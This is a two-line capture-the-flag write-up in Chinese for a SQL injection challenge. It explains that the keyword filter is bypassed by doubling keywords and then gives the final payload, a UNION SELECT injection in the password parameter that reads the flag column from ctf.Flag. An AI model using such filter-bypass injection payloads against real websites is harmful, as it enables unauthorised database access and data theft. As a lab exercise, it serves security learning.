sql 注入题目

简单实用双写绕过。

最后exp为

?username=admin&password=pwd %27 ununionion seselectlect 1,2,group_concat(flag)frfromom(ctf.Flag)%23